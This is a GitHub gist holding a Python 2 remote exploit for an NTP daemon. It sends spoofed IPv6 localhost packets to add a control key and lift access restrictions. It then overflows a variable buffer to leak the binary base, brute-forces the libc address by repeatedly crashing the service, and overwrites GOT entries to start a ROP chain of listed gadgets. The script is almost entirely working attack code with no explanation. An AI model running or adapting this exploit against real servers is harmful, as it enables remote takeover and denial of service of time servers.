Created
February 4, 2016 12:38
-
-
Save stephenR/c57ea2fa2c686dea26d9 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from socket import socket, AF_INET, SOCK_DGRAM, timeout | |
import hashlib | |
import time | |
import struct | |
from scapy.all import sendp, Ether, IPv6, UDP, Raw | |
from bitarray import bitarray | |
IP6 = PUT_TARGET_LINK_LOCAL_IPV6_HERE | |
IP4 = PUT_TARGET_IPV4_HERE | |
SRC_IP4 = PUT_YOUR_IPV4_HERE | |
IFACE = PUT_OUTGOING_INTERFACE_NAME_HERE | |
SPORT = 1234 | |
PORT = 123 | |
SOCKET_TIMEOUT = 0.2 | |
RETRY_TIMEOUT = 0.1 | |
strlen_off = 0x1720 | |
bin_base = 0 | |
rpkt_data = 0x5bee6 | |
rpkt_data_CTL_MAX_DATA_LEN = 0x5c0ba | |
datapt = 0x5c0f8 | |
_free_got = 0x4f230 | |
_strlen_got = 0x4f520 | |
remote_config_buffer = 0x55910 | |
DATAPT_OFF = datapt - rpkt_data | |
DATAEND_OFF = rpkt_data_CTL_MAX_DATA_LEN | |
class NullByteException(Exception): | |
def __init__(self, msg): | |
super(NullByteException, self).__init__(msg) | |
class ShortResponseException(Exception): | |
def __init__(self, msg): | |
super(ShortResponseException, self).__init__(msg) | |
def send_rcv(data, spoof=False, skip_recv=False): | |
if spoof: | |
sendp(Ether()/IPv6(src="::1", dst=IP6)/UDP(sport=SPORT, dport=PORT)/Raw(data), iface=IFACE) | |
return | |
s.sendto(data, (IP4, PORT)) | |
if skip_recv: | |
return | |
data, _ = s.recvfrom(1024) | |
return data | |
def calc_mac(data): | |
return hashlib.md5(auth_key + data).digest() | |
def send_ctrl(data, mode, spoof=False, skip_recv=False, add_mac=True): | |
#print '[debug] send_ctrl {} bytes, mode {}, spoof: {}'.format(len(data), mode, spoof) | |
if len(data) > 0: | |
data = data.ljust(len(data)+(4-(len(data)%4)), "\x00") | |
if add_mac: | |
if len(data) % 8 == 0: | |
data += '\x00'*4 | |
ctrl_pkt = chr(0x20 | 6) #leap version mode | |
ctrl_pkt += chr(mode) #response, more, error, opcode | |
ctrl_pkt += 'AA' #seq nr | |
ctrl_pkt += 'BB' #status word | |
ctrl_pkt += '\x00\x00' #assoc id | |
ctrl_pkt += '\x00\x00' #offset | |
ctrl_pkt += struct.pack('>H', len(data)) #data count | |
ctrl_pkt += data | |
if add_mac: | |
mac = calc_mac(ctrl_pkt) | |
ctrl_pkt += struct.pack('>I', 65535) #keyid | |
ctrl_pkt += mac | |
return send_rcv(ctrl_pkt, spoof, skip_recv=skip_recv) | |
def send_private(data, mode, spoof=False): | |
pkt = chr(0x20 | 7) #leap version mode | |
pkt += chr(0x80) #auth sequence | |
pkt += chr(3) #impl nr | |
pkt += chr(mode) #request | |
pkt += '\x00\x00' #err nitems | |
pkt += struct.pack('>H', len(data)) #mbz_itemsize | |
pkt += data | |
pkt += struct.pack('>I', int(time.time()) - 1 + 0x83aa7e80) | |
pkt += '\x00\x00\x00\x00' #timestamp | |
mac = calc_mac(pkt) | |
pkt += struct.pack('>I', 65535) #keyid | |
pkt += mac | |
return send_rcv(pkt, spoof) | |
def add_ctl_key(): | |
send_private(struct.pack('>I', 65535)+'\x00'*4, 33, spoof=True) | |
def lift_restrict(): | |
send_ctrl('restrict {}\n'.format(SRC_IP4), 8, spoof=True) #set variable | |
def pack_addr(addr): | |
bytes = struct.pack('<Q', addr) | |
bytes = bytes.rstrip('\x00') | |
len_bytes = len(bytes) | |
len_adjust = len('a='+'E'*(DATAPT_OFF-2)) + len_bytes | |
addr -= len_adjust | |
bytes = struct.pack('<Q', addr) | |
bytes = bytes.rstrip('\x00') | |
assert len(bytes) == len_bytes | |
return bytes | |
def overwrite_datapt(bytes): | |
print '[*] overwriting datapt with {} bytes'.format(len(bytes)) | |
assert len(bytes) > 0 and '\x00' not in bytes | |
#send_ctrl('setvar a = ' + 'i'*(DATAPT_OFF-2) + bytes + '\n', 8) #set variable | |
send_ctrl('setvar a = {}\n'.format('i'*(DATAPT_OFF-2) + bytes), 8) #set variable | |
send_ctrl("a=", 2) #read var | |
response, _ = s.recvfrom(4096) | |
return response | |
def leak_base(bytes): | |
response = overwrite_datapt(bytes) | |
if len(response) < DATAPT_OFF + 8 + 8 + 12 + 8: | |
raise ShortResponseException('response too short got {}, want {}'.format(len(response), DATAPT_OFF + 8 + 8 + 12 + 8)) | |
dataend_addr = response[DATAPT_OFF + 12 + 8:DATAPT_OFF + 12 + 8 + 5] + '\x00'*3 | |
dataend_addr = struct.unpack('<Q', dataend_addr)[0] | |
return dataend_addr - DATAEND_OFF | |
def overwrite(what, where, rdi, rsp_8='', use_strlen=True): | |
print '[*] writing 0x{:x} to 0x{:x}'.format(what, where) | |
where = pack_addr(where-5) #TODO 3 or 5? | |
what = struct.pack('<Q', what).rstrip('\x00') | |
if len(where) == 0 or '\x00' in where or len(what) == 0 or '\x00' in what: | |
raise NullByteException('null byte in what or where') | |
send_ctrl('setvar x = "{}"'.format('H'*(DATAPT_OFF-2) + where) + '\n', 8) #set variable | |
send_ctrl('setvar y = "{}"'.format(what) + '\n', 8) #set variable | |
send_ctrl('setvar z = "{}"'.format(rdi) + '\n', 8) #set variable | |
read_var_str = 'x=,y=' | |
if use_strlen: | |
read_var_str += ',z={}'.format(rsp_8) | |
print '[*] preparing the stack' | |
prepare_stack(gadget2+libc_base, bin_base+remote_config_buffer+8) | |
print '[*] preparing the shellcode' | |
prepare_shellcode() | |
print '[*] setting up remote config buffer at address 0x{:x}'.format(bin_base+remote_config_buffer) | |
send_ctrl(shellcode, 8) | |
send_ctrl(read_var_str, 2, skip_recv=True) #read var | |
def add_trap(): | |
s.settimeout(SOCKET_TIMEOUT) | |
try: | |
send_ctrl('', 6) #set variable | |
except timeout as e: | |
s.settimeout(None) | |
raise e | |
s.settimeout(None) | |
def is_up(): | |
pkt = chr(0x20 | 0x3) | |
pkt += chr(0x1) | |
pkt += 'b'*8 | |
pkt += 'c'*8 | |
pkt += 'd'*8 | |
pkt += 'jklmnopq' | |
pkt += '123456' | |
pkt += 'A'*8 | |
try: | |
s.settimeout(SOCKET_TIMEOUT) | |
send_rcv(pkt) | |
s.settimeout(None) | |
return True | |
except timeout: | |
s.settimeout(None) | |
return False | |
def prepare_stack(ret_addr, buf_addr): | |
ret_addr = struct.pack('>Q', ret_addr) | |
buf_addr = struct.pack('>Q', buf_addr) | |
pkt = chr(0x20 | 0x3) | |
pkt += chr(0x1) | |
pkt += 'b'*8 | |
pkt += 'c'*8 | |
pkt += 'd'*8 | |
pkt += 'jklmno' | |
pkt += buf_addr[4:] | |
pkt += buf_addr[:4] | |
pkt += ret_addr[4:] | |
pkt += ret_addr[:4] | |
send_rcv(pkt) | |
def trigger_crash(): | |
try: | |
s.settimeout(SOCKET_TIMEOUT) | |
send_ctrl('setvar a = ' + 'H'*(DATAPT_OFF-2) + 'a'*8 + '\n', 8) #set variable | |
send_ctrl('a=', 2, skip_recv=True) #read var | |
except timeout: | |
pass | |
auth_key = 'AAAA' | |
s = None | |
def prepare_connection(): | |
global s | |
s = socket(AF_INET, SOCK_DGRAM) | |
while not is_up(): | |
print '[*] host not reachable, retrying in {} second'.format(RETRY_TIMEOUT) | |
time.sleep(RETRY_TIMEOUT) | |
print '[*] adding ctl key' | |
add_ctl_key() | |
print '[*] lifting restrictions' | |
lift_restrict() | |
print '[*] adding trap' | |
add_trap() | |
def crash(): | |
prepare_connection() | |
trigger_crash() | |
def overwrite_got(what, rdi, rsp_8, use_strlen=True): | |
global bin_base | |
prepare_connection() | |
if use_strlen: | |
where = _strlen_got | |
else: | |
where = _free_got | |
print '[*] leaking base address' | |
try: | |
s.settimeout(SOCKET_TIMEOUT) | |
bin_base = leak_base('\xfc\x20') | |
s.settimeout(None) | |
except ShortResponseException: | |
print '[*] leaking base address failed, retrying' | |
return overwrite_got(what, rdi, rsp_8, use_strlen) | |
print '[*] binary at 0x{:x}'.format(bin_base) | |
try: | |
overwrite(what, bin_base+where, rdi, rsp_8, use_strlen=use_strlen) | |
s.settimeout(SOCKET_TIMEOUT) | |
s.recvfrom(1024)[0].encode('hex') | |
except NullByteException: | |
print '[*] null byte in address, crash and retry' | |
trigger_crash() | |
return overwrite_got(what, rdi, rsp_8, use_strlen) | |
shellcode = '' | |
ropchain = 'A'*8 | |
def prepare_shellcode(): | |
global shellcode | |
shellcode = '\n'+'\x00'*7 | |
shellcode += 'D'*8 | |
shellcode += struct.pack('<Q', libc_base+gadget7) | |
shellcode += struct.pack('<Q', libc_base+gadget3) | |
shellcode += 'E'*8 | |
shellcode += 'F'*8 | |
shellcode += struct.pack('<Q', libc_base+gadget5) #new rdi | |
shellcode += struct.pack('<Q', bin_base+remote_config_buffer+8) #new rdi | |
shellcode += struct.pack('<Q', libc_base+gadget6) #rbx | |
shellcode += struct.pack('<Q', libc_base+gadget4) | |
shellcode += 'G'*16 | |
shellcode += ropchain | |
libc_base = 0 | |
gadget1 = 0x11065 #add rsp, x | |
gadget2 = 0x67d81 #mov rdi, r12 | |
gadget3 = 0x438ba #fix rbp | |
gadget4 = 0x1c6d7 #load rbx rdi+0x38 | |
gadget5 = 0x5fa49 #mov rsi, r12 | |
gadget6 = 0x56fd #push rsi, pop rsp | |
gadget7 = 0x2bd06 #add rsp, n | |
CHAR_BLACKLIST = '\x00\n"\xff' | |
ranges = [xrange(1,2**4), reversed(xrange(1,2**8)), xrange(1,2**5)] | |
shifts = [12, 16, 24] | |
strlen_addr = strlen_off | |
for i in range(3): | |
for a in ranges[i]: | |
addr = (a<<shifts[i]) + strlen_addr | |
if i == 2: | |
addr += 0x80000000 | |
print '[*] trying strlen address 0x{:x}'.format(addr) | |
if any(c in CHAR_BLACKLIST for c in struct.pack('<Q', addr).rstrip('\x00')): | |
continue | |
overwrite_got(addr, 'A', 'A') | |
print '[*] found candidate, verifying' | |
if is_up(): | |
trigger_crash() | |
overwrite_got(addr, 'A', 'A') | |
if is_up(): | |
trigger_crash() | |
strlen_addr = addr | |
print '[*] found next byte. New address: 0x{:x}'.format(addr) | |
break | |
strlen_addr += 0x7fff00000000 | |
libc_base = strlen_addr - strlen_off | |
print '[*] found libc base: 0x{:x}'.format(libc_base) | |
overwrite_got(libc_base+gadget1, 'A', 'A') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment